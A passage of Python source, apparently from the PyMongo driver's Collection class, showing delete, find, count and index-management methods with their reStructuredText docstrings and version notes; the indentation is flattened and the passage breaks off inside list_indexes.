>>> db.foo.drop()
>>> db.drop_collection("foo")
.. versionchanged:: 3.7
:meth:`drop` now respects this :class:`Collection`'s :attr:`write_concern`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
dbo.drop_collection(self.__name, session=session)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None, retryable_write=False):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
delete_doc = SON([('q', criteria),
('limit', int(not multi))])
collation = validate_collation_or_none(collation)
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
delete_doc['collation'] = collation
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [delete_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, op_id,
False, message.delete, self.__full_name, criteria,
False, write_concern.document,
self.__write_response_codec_options,
int(not multi))
# Delete command.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
return result
def _delete_retryable(
self, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None):
"""Internal delete helper."""
def _delete(session, sock_info, retryable_write):
return self._delete(
sock_info, criteria, multi,
write_concern=write_concern, op_id=op_id, ordered=ordered,
collation=collation, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_delete, session)
def delete_one(self, filter, collation=None, session=None):
"""Delete a single document matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count_documents({'x': 1})
2
:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, False,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def delete_many(self, filter, collation=None, session=None):
"""Delete one or more documents matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count_documents({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, True,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
>>> collection.find_one(max_time_ms=100)
"""
if (filter is not None and not
isinstance(filter, abc.Mapping)):
filter = {"_id": filter}
cursor = self.find(filter, *args, **kwargs)
for result in cursor.limit(-1):
return result
return None
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return. A limit of 0 (the default) is equivalent to setting no
limit.
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
- `cursor_type` (optional): the type of cursor to return. The valid
options are defined by :class:`~pymongo.cursor.CursorType`:
- :attr:`~pymongo.cursor.CursorType.NON_TAILABLE` - the result of
this find call will return a standard cursor over the result set.
- :attr:`~pymongo.cursor.CursorType.TAILABLE` - the result of this
find call will be a tailable cursor - tailable cursors are only
for use with capped collections. They are not closed when the
last data is retrieved but are kept open and the cursor location
marks the final document position. If more data is received
iteration of the cursor will continue from the last document
received. For details, see the `tailable cursor documentation
<http://www.mongodb.org/display/DOCS/Tailable+Cursors>`_.
- :attr:`~pymongo.cursor.CursorType.TAILABLE_AWAIT` - the result
of this find call will be a tailable cursor with the await flag
set. The server will wait for a few seconds after returning the
full result set so that it can capture and return additional data
added during the query.
- :attr:`~pymongo.cursor.CursorType.EXHAUST` - the result of this
find call will be an exhaust cursor. MongoDB will stream batched
results to the client without waiting for the client to request
each batch, reducing latency. See notes on compatibility below.
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for this query. See
:meth:`~pymongo.cursor.Cursor.sort` for details.
- `allow_partial_results` (optional): if True, mongos will return
partial results if some shards are down instead of returning an
error.
- `oplog_replay` (optional): If True, set the oplogReplay query
flag.
- `batch_size` (optional): Limits the number of documents returned in
a single batch.
- `manipulate` (optional): **DEPRECATED** - If True (the default),
apply any outgoing SON manipulators before returning.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `return_key` (optional): If True, return only the index keys in
each document.
- `show_record_id` (optional): If True, adds a field ``$recordId`` in
each document with the storage engine's internal record identifier.
- `snapshot` (optional): **DEPRECATED** - If True, prevents the
cursor from returning a document more than once because of an
intervening write operation.
- `hint` (optional): An index, in the same format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.hint` on the cursor to tell Mongo the
proper index to use for the query.
- `max_time_ms` (optional): Specifies a time limit for a query
operation. If the specified time is exceeded, the operation will be
aborted and :exc:`~pymongo.errors.ExecutionTimeout` is raised. Pass
this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_time_ms` on the cursor.
- `max_scan` (optional): **DEPRECATED** - The maximum number of
documents to scan. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max_scan` on the cursor.
- `min` (optional): A list of field, limit pairs specifying the
inclusive lower bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.min` on the cursor. ``hint`` must
also be passed to ensure the query utilizes the correct index.
- `max` (optional): A list of field, limit pairs specifying the
exclusive upper bound for all keys of a specific index in order.
Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.max` on the cursor. ``hint`` must
also be passed to ensure the query utilizes the correct index.
- `comment` (optional): A string to attach to the query to help
interpret and trace the operation in the server logs and in profile
data. Pass this as an alternative to calling
:meth:`~pymongo.cursor.Cursor.comment` on the cursor.
- `modifiers` (optional): **DEPRECATED** - A dict specifying
additional MongoDB query modifiers. Use the keyword arguments listed
above instead.
.. note:: There are a number of caveats to using
:attr:`~pymongo.cursor.CursorType.EXHAUST` as cursor_type:
- The `limit` option can not be used with an exhaust cursor.
- Exhaust cursors are not supported by mongos and can not be
used with a sharded cluster.
- A :class:`~pymongo.cursor.Cursor` instance created with the
:attr:`~pymongo.cursor.CursorType.EXHAUST` cursor_type requires an
exclusive :class:`~socket.socket` connection to MongoDB. If the
:class:`~pymongo.cursor.Cursor` is discarded without being
completely iterated the underlying :class:`~socket.socket`
connection will be closed and discarded without being returned to
the connection pool.
.. versionchanged:: 3.7
Deprecated the `snapshot` option, which is deprecated in MongoDB
3.6 and removed in MongoDB 4.0.
Deprecated the `max_scan` option. Support for this option is
deprecated in MongoDB 4.0. Use `max_time_ms` instead to limit server
side execution time.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.5
Added the options `return_key`, `show_record_id`, `snapshot`,
`hint`, `max_time_ms`, `max_scan`, `min`, `max`, and `comment`.
Deprecated the option `modifiers`.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.0
Changed the parameter names `spec`, `fields`, `timeout`, and
`partial` to `filter`, `projection`, `no_cursor_timeout`, and
`allow_partial_results` respectively.
Added the `cursor_type`, `oplog_replay`, and `modifiers` options.
Removed the `network_timeout`, `read_preference`, `tag_sets`,
`secondary_acceptable_latency_ms`, `max_scan`, `snapshot`,
`tailable`, `await_data`, `exhaust`, `as_class`, and slave_okay
parameters. Removed `compile_re` option: PyMongo now always
represents BSON regular expressions as :class:`~bson.regex.Regex`
objects. Use :meth:`~bson.regex.Regex.try_compile` to attempt to
convert from a BSON regular expression to a Python regular
expression object. Soft deprecated the `manipulate` option.
.. versionchanged:: 2.7
Added `compile_re` option. If set to False, PyMongo represented BSON
regular expressions as :class:`~bson.regex.Regex` objects instead of
attempting to compile BSON regular expressions as Python native
regular expressions, thus preventing errors for some incompatible
patterns, see `PYTHON-500`_.
.. versionadded:: 2.3
The `tag_sets` and `secondary_acceptable_latency_ms` parameters.
.. _PYTHON-500: https://jira.mongodb.org/browse/PYTHON-500
.. mongodoc:: find
"""
return Cursor(self, *args, **kwargs)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.find_raw_batches()
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: find_raw_batches does not support sessions or auto
encryption.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"find_raw_batches does not support sessions")
# OP_MSG is required to support encryption.
if self.__database.client._encrypter:
raise InvalidOperation(
"find_raw_batches does not support auto encryption")
return RawBatchCursor(self, *args, **kwargs)
def parallel_scan(self, num_cursors, session=None, **kwargs):
"""**DEPRECATED**: Scan this entire collection in parallel.
Returns a list of up to ``num_cursors`` cursors that can be iterated
concurrently. As long as the collection is not modified during
scanning, each document appears once in one of the cursors result
sets.
For example, to process each document in a collection using some
thread-safe ``process_document()`` function:
>>> def process_cursor(cursor):
... for document in cursor:
... # Some thread-safe processing function:
... process_document(document)
>>>
>>> # Get up to 4 cursors.
...
>>> cursors = collection.parallel_scan(4)
>>> threads = [
... threading.Thread(target=process_cursor, args=(cursor,))
... for cursor in cursors]
>>>
>>> for thread in threads:
... thread.start()
>>>
>>> for thread in threads:
... thread.join()
>>>
>>> # All documents have now been processed.
The :meth:`parallel_scan` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `num_cursors`: the number of cursors to return
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs`: additional options for the parallelCollectionScan
command can be passed as keyword arguments.
.. note:: Requires server version **>= 2.5.5**.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added back support for arbitrary keyword arguments. MongoDB 3.4
adds support for maxTimeMS as an option to the
parallelCollectionScan command.
.. versionchanged:: 3.0
Removed support for arbitrary keyword arguments, since
the parallelCollectionScan command has no optional arguments.
"""
warnings.warn("parallel_scan is deprecated. MongoDB 4.2 will remove "
"the parallelCollectionScan command.",
DeprecationWarning, stacklevel=2)
cmd = SON([('parallelCollectionScan', self.__name),
('numCursors', num_cursors)])
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
# We call sock_info.command here directly, instead of
# calling self._command to avoid using an implicit session.
result = sock_info.command(
self.__database.name,
cmd,
slave_ok,
self._read_preference_for(session),
self.codec_options,
read_concern=self.read_concern,
parse_write_concern_error=True,
session=session,
client=self.__database.client)
cursors = []
for cursor in result['cursors']:
cursors.append(CommandCursor(
self, cursor['cursor'], sock_info.address,
session=session, explicit_session=session is not None))
return cursors
def _count(self, cmd, collation=None, session=None):
"""Internal count helper."""
# XXX: "ns missing" checks can be removed when we drop support for
# MongoDB 3.0, see SERVER-17051.
def _cmd(session, server, sock_info, slave_ok):
res = self._command(
sock_info,
cmd,
slave_ok,
allowable_errors=["ns missing"],
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
if res.get("errmsg", "") == "ns missing":
return 0
return int(res["n"])
return self.__database.client._retryable_read(
_cmd, self._read_preference_for(session), session)
def _aggregate_one_result(
self, sock_info, slave_ok, cmd, collation=None, session=None):
"""Internal helper to run an aggregate that returns a single result."""
result = self._command(
sock_info,
cmd,
slave_ok,
codec_options=self.__write_response_codec_options,
read_concern=self.read_concern,
collation=collation,
session=session)
batch = result['cursor']['firstBatch']
return batch[0] if batch else None
def estimated_document_count(self, **kwargs):
"""Get an estimate of the number of documents in this collection using
collection metadata.
The :meth:`estimated_document_count` method is **not** supported in a
transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
:Parameters:
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
"""
if 'session' in kwargs:
raise ConfigurationError(
'estimated_document_count does not support sessions')
cmd = SON([('count', self.__name)])
cmd.update(kwargs)
return self._count(cmd)
def count_documents(self, filter, session=None, **kwargs):
"""Count the number of documents in this collection.
.. note:: For a fast count of the total documents in a collection see
:meth:`estimated_document_count`.
The :meth:`count_documents` method is supported in a transaction.
All optional parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count. Must be
a positive integer. If not provided, no limit is imposed.
- `maxTimeMS` (int): The maximum amount of time to allow this
operation to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
This option is only supported on MongoDB 3.6 and above.
The :meth:`count_documents` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (required): A query document that selects which documents
to count in the collection. Can be an empty document to count all
documents.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionadded:: 3.7
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
pipeline = [{'$match': filter}]
if 'skip' in kwargs:
pipeline.append({'$skip': kwargs.pop('skip')})
if 'limit' in kwargs:
pipeline.append({'$limit': kwargs.pop('limit')})
pipeline.append({'$group': {'_id': 1, 'n': {'$sum': 1}}})
cmd = SON([('aggregate', self.__name),
('pipeline', pipeline),
('cursor', {})])
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
def _cmd(session, server, sock_info, slave_ok):
result = self._aggregate_one_result(
sock_info, slave_ok, cmd, collation, session)
if not result:
return 0
return result['n']
return self.__database.client._retryable_read(
_cmd, self._read_preference_for(session), session)
def count(self, filter=None, session=None, **kwargs):
"""**DEPRECATED** - Get the number of documents in this collection.
The :meth:`count` method is deprecated and **not** supported in a
transaction. Please use :meth:`count_documents` or
:meth:`estimated_document_count` instead.
All optional count parameters should be passed as keyword arguments
to this method. Valid options include:
- `skip` (int): The number of matching documents to skip before
returning results.
- `limit` (int): The maximum number of documents to count. A limit
of 0 (the default) is equivalent to setting no limit.
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `hint` (string or list of tuples): The index to use. Specify either
the index name as a string or the index specification as a list of
tuples (e.g. [('a', pymongo.ASCENDING), ('b', pymongo.ASCENDING)]).
The :meth:`count` method obeys the :attr:`read_preference` of
this :class:`Collection`.
.. note:: When migrating from :meth:`count` to :meth:`count_documents`
the following query operators must be replaced:
+-------------+-------------------------------------+
| Operator | Replacement |
+=============+=====================================+
| $where | `$expr`_ |
+-------------+-------------------------------------+
| $near | `$geoWithin`_ with `$center`_ |
+-------------+-------------------------------------+
| $nearSphere | `$geoWithin`_ with `$centerSphere`_ |
+-------------+-------------------------------------+
$expr requires MongoDB 3.6+
:Parameters:
- `filter` (optional): A query document that selects which documents
to count in the collection.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.7
Deprecated.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. _$expr: https://docs.mongodb.com/manual/reference/operator/query/expr/
.. _$geoWithin: https://docs.mongodb.com/manual/reference/operator/query/geoWithin/
.. _$center: https://docs.mongodb.com/manual/reference/operator/query/center/#op._S_center
.. _$centerSphere: https://docs.mongodb.com/manual/reference/operator/query/centerSphere/#op._S_centerSphere
"""
warnings.warn("count is deprecated. Use estimated_document_count or "
"count_documents instead. Please note that $where must "
"be replaced by $expr, $near must be replaced by "
"$geoWithin with $center, and $nearSphere must be "
"replaced by $geoWithin with $centerSphere",
DeprecationWarning, stacklevel=2)
cmd = SON([("count", self.__name)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
if "hint" in kwargs and not isinstance(kwargs["hint"], string_type):
kwargs["hint"] = helpers._index_document(kwargs["hint"])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
return self._count(cmd, collation, session)
def create_indexes(self, indexes, session=None, **kwargs):
"""Create one or more indexes on this collection.
>>> from pymongo import IndexModel, ASCENDING, DESCENDING
>>> index1 = IndexModel([("hello", DESCENDING),
... ("world", ASCENDING)], name="hello_world")
>>> index2 = IndexModel([("goodbye", DESCENDING)])
>>> db.test.create_indexes([index1, index2])
["hello_world", "goodbye_-1"]
:Parameters:
- `indexes`: A list of :class:`~pymongo.operations.IndexModel`
instances.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: `create_indexes` uses the `createIndexes`_ command
introduced in MongoDB **2.6** and cannot be used with earlier
versions.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionadded:: 3.0
.. _createIndexes: https://docs.mongodb.com/manual/reference/command/createIndexes/
"""
common.validate_list('indexes', indexes)
names = []
with self._socket_for_writes(session) as sock_info:
supports_collations = sock_info.max_wire_version >= 5
def gen_indexes():
for index in indexes:
if not isinstance(index, IndexModel):
raise TypeError(
"%r is not an instance of "
"pymongo.operations.IndexModel" % (index,))
document = index.document
if "collation" in document and not supports_collations:
raise ConfigurationError(
"Must be connected to MongoDB "
"3.4+ to use collations.")
names.append(document["name"])
yield document
cmd = SON([('createIndexes', self.name),
('indexes', list(gen_indexes()))])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
return names
def __create_index(self, keys, index_options, session, **kwargs):
"""Internal create index helper.
:Parameters:
- `keys`: a list of tuples [(key, type), (key, type), ...]
- `index_options`: a dict of index options.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
"""
index_doc = helpers._index_document(keys)
index = {"key": index_doc}
collation = validate_collation_or_none(
index_options.pop('collation', None))
index.update(index_options)
with self._socket_for_writes(session) as sock_info:
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
else:
index['collation'] = collation
cmd = SON([('createIndexes', self.name), ('indexes', [index])])
cmd.update(kwargs)
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
codec_options=_UNICODE_REPLACE_CODEC_OPTIONS,
write_concern=self._write_concern_for(session),
session=session)
def create_index(self, keys, session=None, **kwargs):
"""Creates an index on this collection.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
To create a single key ascending index on the key ``'mike'`` we just
use a string argument::
>>> my_collection.create_index("mike")
For a compound index on ``'mike'`` descending and ``'eliot'``
ascending we need to use a list of tuples::
>>> my_collection.create_index([("mike", pymongo.DESCENDING),
... ("eliot", pymongo.ASCENDING)])
All optional index creation parameters should be passed as
keyword arguments to this method. For example::
>>> my_collection.create_index([("mike", pymongo.DESCENDING)],
... background=True)
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index. Requires server version >=3.2.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `wildcardProjection`: Allows users to include or exclude specific
field paths from a `wildcard index`_ using the { "$**" : 1} key
pattern. Requires server version >= 4.2.
See the MongoDB documentation for a full list of supported options by
server version.
.. warning:: `dropDups` is not supported by MongoDB 3.0 or newer. The
option is silently ignored by the server and unique index builds
using the option will fail if a duplicate value is detected.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for passing maxTimeMS
in kwargs.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. versionchanged:: 3.0
Renamed `key_or_list` to `keys`. Removed the `cache_for` option.
:meth:`create_index` no longer caches index names. Removed support
for the drop_dups and bucket_size aliases.
.. mongodoc:: indexes
.. _wildcard index: https://docs.mongodb.com/master/core/index-wildcard/#wildcard-index-core
"""
keys = helpers._index_list(keys)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
cmd_options = {}
if "maxTimeMS" in kwargs:
cmd_options["maxTimeMS"] = kwargs.pop("maxTimeMS")
self.__create_index(keys, kwargs, session, **cmd_options)
return name
def ensure_index(self, key_or_list, cache_for=300, **kwargs):
"""**DEPRECATED** - Ensures that an index exists on this collection.
.. versionchanged:: 3.0
**DEPRECATED**
"""
warnings.warn("ensure_index is deprecated. Use create_index instead.",
DeprecationWarning, stacklevel=2)
# The types supported by datetime.timedelta.
if not (isinstance(cache_for, integer_types) or
isinstance(cache_for, float)):
raise TypeError("cache_for must be an integer or float.")
if "drop_dups" in kwargs:
kwargs["dropDups"] = kwargs.pop("drop_dups")
if "bucket_size" in kwargs:
kwargs["bucketSize"] = kwargs.pop("bucket_size")
keys = helpers._index_list(key_or_list)
name = kwargs.setdefault("name", helpers._gen_index_name(keys))
# Note that there is a race condition here. One thread could
# check if the index is cached and be preempted before creating
# and caching the index. This means multiple threads attempting
# to create the same index concurrently could send the index
# to the server two or more times. This has no practical impact
# other than wasted round trips.
if not self.__database.client._cached(self.__database.name,
self.__name, name):
self.__create_index(keys, kwargs, session=None)
self.__database.client._cache_index(self.__database.name,
self.__name, name, cache_for)
return name
return None
def drop_indexes(self, session=None, **kwargs):
"""Drops all indexes on this collection.
Can be used on non-existant collections or collections with no indexes.
Raises OperationFailure on an error.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
self.__database.client._purge_index(self.__database.name, self.__name)
self.drop_index("*", session=session, **kwargs)
def drop_index(self, index_or_name, session=None, **kwargs):
"""Drops the specified index on this collection.
Can be used on non-existant collections or collections with no
indexes. Raises OperationFailure on an error (e.g. trying to
drop an index that does not exist). `index_or_name`
can be either an index name (as returned by `create_index`),
or an index specifier (as passed to `create_index`). An index
specifier should be a list of (key, direction) pairs. Raises
TypeError if index is not an instance of (str, unicode, list).
.. warning::
if a custom name was used on index creation (by
passing the `name` parameter to :meth:`create_index` or
:meth:`ensure_index`) the index **must** be dropped by name.
:Parameters:
- `index_or_name`: index (or name of index) to drop
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the createIndexes
command (like maxTimeMS) can be passed as keyword arguments.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
name = index_or_name
if isinstance(index_or_name, list):
name = helpers._gen_index_name(index_or_name)
if not isinstance(name, string_type):
raise TypeError("index_or_name must be an index name or list")
self.__database.client._purge_index(
self.__database.name, self.__name, name)
cmd = SON([("dropIndexes", self.__name), ("index", name)])
cmd.update(kwargs)
with self._socket_for_writes(session) as sock_info:
self._command(sock_info,
cmd,
read_preference=ReadPreference.PRIMARY,
allowable_errors=["ns not found", 26],
write_concern=self._write_concern_for(session),
session=session)
def reindex(self, session=None, **kwargs):
"""Rebuilds all indexes on this collection.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): optional arguments to the reIndex
command (like maxTimeMS) can be passed as keyword arguments.
.. warning:: reindex blocks all other operations (indexes
are built in the foreground) and will be slow for large
collections.
.. versionchanged:: 3.6
Added ``session`` parameter. Added support for arbitrary keyword
arguments.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. versionchanged:: 3.5
We no longer apply this collection's write concern to this operation.
MongoDB 3.4 silently ignored the write concern. MongoDB 3.6+ returns
an error if we include the write concern.
"""
cmd = SON([("reIndex", self.__name)])
cmd.update(kwargs)
with self._socket_for_writes(session) as sock_info:
return self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
session=session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection.
>>> for index in db.test.list_indexes():
... print(index)
...
